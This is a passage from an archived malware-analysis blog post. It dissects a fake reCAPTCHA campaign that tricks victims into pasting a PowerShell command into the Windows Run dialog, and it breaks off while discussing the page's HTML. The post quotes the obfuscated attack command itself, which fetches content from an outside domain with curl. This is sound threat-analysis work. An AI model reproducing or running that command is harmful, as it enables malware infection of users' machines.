Breaking Down A Multi-Stage PowerShell Infection Archived: 2026-04-05 19:51:57 UTC 1. 2. Blog 3. Breaking Down A Multi-Stage PowerShell Infection Previous Post Analyzing Vidar Stealer Next Post Cipher Hunt: How to Detect Encryption Algorithms in Malware Overview Fake reCAPTCHA campaigns are nothing new in the cyber threat landscape. Despite their simplicity, these campaigns are surprisingly effective at tricking users. The technique is straightforward: the victim is shown a fake reCAPTCHA page that instructs them to verify their identity by pasting a PowerShell command into the Windows Run dialog. This seemingly harmless action initiates the infection chain. This article will focus on deobfuscating and analyzing the infection chain step by step, all the way to the final payload. It will also break down and explain the various techniques used by the attacker. https://aviab1.github.io/blog/powershell-infection-2025/ Page 1 of 18 Here’s a high-level diagram of the infection chain: 1st Stage Analysis We can see the infamous fake reCAPTCHA page. Upon clicking “I’m not a robot,” a prompt pops up, providing us with clear instructions regarding the “verification” process. If we follow the instructions, we notice that something is copied to our clipboard. At first glance, this doesn’t appear alarming. https://aviab1.github.io/blog/powershell-infection-2025/ Page 2 of 18 However, when we paste the command into a text editor, we quickly realize it reveals something much different from what we initially expected. PoWERSHElL -w M"in"i"m"ized c"Url.E"X"e" -k -L --"re"try 9"9"9 ht"tps:/"/"dy"b"e"p.fu"n"/"fb8"8"c Before we delve into the specifics of what this command does and the techniques it employs, it’s crucial to first understand how this command made its way into our clipboard. Looking at the HTML source code, we can see the initialization of a new